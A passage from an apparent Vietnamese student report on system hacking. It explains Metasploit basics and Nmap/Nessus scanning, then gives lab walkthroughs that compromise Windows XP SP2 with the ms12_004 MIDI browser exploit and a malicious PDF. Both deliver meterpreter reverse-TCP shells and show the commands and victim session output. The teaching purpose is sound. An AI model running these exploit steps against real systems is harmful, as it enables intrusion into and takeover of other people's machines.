Một vài module còn có những advanced options, chúng ta có thể xem bằng cách
gõ dòng lệnh show advanceds.
c)Verify những options vừa cấu hình:
check: kiểm tra xem những option đã được set chính xác chưa.
d)Lựa chọn target:
show targets: những target được cung cấp bởi module đó.
set: xác định target nào.
e)Lựa chọn payload:
show payloads: liệt kê ra những payload của module exploit hiện tại.
info payload_name: xem thông tin chi tiết về payload đó.
setpayloadpayload_name:xácđịnhpayloadmodulename.Saukhilựachọn payload
nào, dùng lệnh show options để xem những options của payload đó.
show advanced: xem những advanced options của payload đó.
g)Thực thi exploit:
exploit:lệnhdùngđểthựcthipayloadcode.Payloadsauđósẽcungcấpcho chúng ta
những thông tin về hệ thống được khai thác.
10. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 10
2.3 Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng
cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính
trongmạngLANcóthểchiasẻtàinguyênvớinhau,màđiểnhìnhlàchiasẻtập tin, máy in, máy
quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các
chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong
mạng.
Nmap(NetworkMapper)làmộttiệníchnguồnmởmiễnphíchopháthiện mạng và kiểm
toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong
BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng,
cácdịchvụ(tênứngdụngvàphiênbản)màhostđóđangcungcấp,hệđiều
hànhgì(vàcácphiênbảnhệđiềuhành)màhọđangchạy,loạibộlọcgóitinhoặc tường lửa nào
đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và
các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OS X.
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét
lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy cập
11. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 11
vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ
http://www.nessus.org/.
Mộtkhiđãxâmnhậpthànhcôngvàchiếmđượctoànquyềnđiềukhiểnhệ
thống,Hackercóthểthựchiệnmọiviệctrênmáynạnnhânnhưdown/uploadfiles,
thayđổicấutrúchệthống,thựcthichươngtrình,đánhcắpmậtkhẩu,càitrojan/ backdoor, …
2.4 Xâm nhập và khai thác Windows XP
2.4.1 Lỗ hổng sử dụng: Ms12_004
Khởi động msfconsole tử cửa sổ terminal của BackTrack.
Khai báo lỗ hổng sử dụng và thiết đặt options:
Search ms12_004
use exploit/windows/browser/ms12_004_midi
show options
set SRVHOST 192.168.159.128
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.159.128
exploit
12. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 12
BackTrack sẽ tạo ra một link chứa mã độc (http ://192.168.159.128:4444). Chỉ cần
nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn
nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.
Tiến hành khai thác máy nạn nhân có IP: 192.168.159.130 port 1078.
13. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 13
sessions
sessions –i 1
getuid
sysinfo
Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2.
Nạn nhân :
Computer: QUYDONGN – 3B5D9F.
Os: Windows XP (Build 2600. Service Pack 2).
Architecture: x86.
Systemlanguage: en US.
Meterpreter: x86/win32.
14. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 14
2.4.2 Lỗ hổng sử dụng thông qua file PDF
Khởi động msfconsole tử cửa sổ terminal của BackTrack.
Khai báo lỗ hổng sử dụng và thiết đặt options:
Search nojs
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
show options
set FILENAME hack.pdf
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.136.128
set LPORT 4444
exlpoit
Backtrack thông báo đã tạo thành công 1 file hack.pdf nằm trong thư mục
/root/ms4/local/.
use multi/hanler
set payload windows/meterpreter/reverse_tcp
15. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 15
set LHOST 192.168.136.128
exploit
Backtrack thông báo đã sẵn sàng cho việc tấn công. Chúng ta sẽ gửi file hack.pdf
vừa tạo ra trước đó cho nạn nhân. Nếu nạn nhân mở file hack.pdf thì Backtrack sẽ gửi các
mã độc sang máy nạn nhân để lấy thông tin và chiếm quyền điều khiển máy nạn nhân.
16. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 16
Backtrack thông báo có 1 sessions đã mở file hack.pdf là máy có địa chỉ IP
192.168.136.128 port 1037 và đã gửi 752128 file mã độc sang máy nạn nhân. Tiếp theo
chúng ta sẽ kiểm tra thông tin máy nạn nhân.
sysinfo
17. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 17
Hacked: khai thác thành công thông qua lỗi file PDF trên winXP SP2
Nạn nhân:
Computer: HUUANHH – 9091FB1.
Os: Windows XP (Build 2600. Service Pack 2).
Architecture: x86.
Systemlanguage: en US.
Meterpreter: x86/win32.